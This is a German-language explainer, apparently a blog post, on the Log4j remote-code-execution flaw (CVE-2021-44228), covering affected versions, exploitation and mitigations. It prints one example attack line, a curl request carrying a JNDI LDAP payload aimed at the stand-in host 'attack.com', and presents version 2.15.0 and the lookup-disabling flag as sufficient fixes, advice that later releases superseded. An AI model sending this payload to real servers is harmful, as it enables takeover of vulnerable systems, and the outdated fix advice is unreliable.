Die Log4j-Sicherheitslücke betrifft alles, von der Cloud bis hin zu Entwickler-Tools und Sicherheitsgeräten. Nachfolgend erfahren Sie, worauf Sie nach den neuesten Informationen achten sollten.
Was ist Log4j?
Bei der Log4j-Schwachstelle handelt es sich um eine neue kritische Zero-Day-Schwachstelle, die im Open-Source-Apache-Logging-Framework „Log4j“ entdeckt wurde, das zur Aufzeichnung der Aktivitäten innerhalb einer Java-Anwendung verwendet wird. Es handelt sich um eine schwerwiegende Sicherheitslücke, die dadurch ausgelöst wird, dass ein Benutzer eine bösartige Nutzlast als Anfrage an den Server sendet, auf dem eine Java-Anwendung läuft, die das Log4j-Paket zur Aufzeichnung der Aktivitäten verwendet. Dies kann durch das Senden einer normalen Anfrage zusammen mit einer Nutzlast wie der folgenden ausgelöst werden
curl xxxxx -H 'X-Api-Version: ${jndi:ldap://attack.com/attack}Das obige curl sendet eine Anfrage an den XXXX-Server mit der Nutzlast, die eine Website oder eine beliebige IP-Adresse über die Java Naming Directory-Schnittstelle aufruft. Anstatt den Payload herauszufiltern, ruft das JNDI direkt die Website „attack.com“ über das ldap-Protokoll auf. Dies kann dazu verwendet werden, jeden laufenden Server auszunutzen, da jeder Angreifer direkt Befehle auf dem Server ausführen kann, indem er ein Skript mit diesem Ausnutzungsbefehl herunterlädt.
Mehr dazu finden Sie hier - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
Wie können Hacker die Sicherheitslücke in Log4j ausnutzen?
Die Log4j-Schwachstelle, die letzte Woche von Apache bekannt gegeben wurde, ermöglicht es Angreifern, Code aus der Ferne auf einem Zielcomputer auszuführen, was bedeutet, dass sie Daten stehlen, Malware installieren oder die Kontrolle übernehmen können. Einige Cyberkriminelle haben Software installiert, die ein gehacktes System zum Mining von Kryptowährungen nutzt, während andere Malware entwickelt haben, die es Angreifern ermöglicht, Computer für groß angelegte Angriffe auf die Internet-Infrastruktur zu kapern.
Wo wird Log4j eingesetzt?
Die Log4j 2-Bibliothek wird in Java-Unternehmenssoftware verwendet und ist laut der britischen NCSC in Apache-Frameworks wie Apache Struts2, Apache Solr, Apache Druid, Apache Flink und Apache Swift enthalten.
Wie weit wird die Log4j-Schwachstelle ausgenutzt?
Sicherheitsexperten haben davor gewarnt, dass es Hunderttausende von Versuchen von Hackern gibt, verwundbare Geräte zu finden; über 40 Prozent der Unternehmensnetzwerke wurden nach Angaben eines Sicherheitsunternehmens angegriffen.
Welche Versionen der Log4j-Bibliothek sind anfällig?
Fast alle Versionen von Log4j sind verwundbar, angefangen von 2.0-beta9 bis 2.14.1. Die einfachste und effektivste Schutzmethode besteht darin, die neueste Version der Bibliothek, 2.15.0, zu installieren.
Wie kann man seinen Server vor Log4j-Angriffen schützen?
Gemäß dem Grundschutzmodul [BSI2021a] sollte in allen Anwendungen ein Update auf die aktuelle Version 2.15.0 [APA2021] (gittag: 2.15.0-rc2 [GIT2021c]) von log4j sichergestellt werden. Da Updates von Abhängigkeiten in Java-Applikationen oft nicht zeitnah durchgeführt werden können, sollte bis dahin die folgende Abhilfemaßnahme getroffen werden:
Die Option "log4j2.formatMsgNoLookups" sollte von der Java Virtual Machine mit dem Argument "true" gesetzt werden
"-Dlog4j2.formatMsgNoLookups = True" gestartet wird.Vorsicht ist geboten: Diese Maßnahme kann die Funktionalität der Anwendung beeinträchtigen, wenn die Nachschlagefunktion tatsächlich genutzt wird.
Um frühere Versionen von Log4j (von 2.0-beta9 bis 2.10.0) zu schützen, empfehlen die Entwickler der Bibliothek, die Klasse JndiLookup aus dem Klassenpfad zu entfernen:Wie verhindert man, dass die Log4j-Schwachstelle ausgenutzt wird?
Obwohl log4j mit einer neueren Version 2.15.0 herausgekommen ist, in der der Exploit ausgeschaltet ist. Der beste Weg, sich zu schützen, ist die Einrichtung von Firewall-Regeln, die verhindern, dass jemand eingehende Anfragen über LDAP-Protokolle an die kritischen Server sendet.
Sie können das neueste Paket unter diesem offiziellen Link herunterladen https://logging.apache.org/log4j/2.x/download.html
Alan Bradford
März 6, 2023
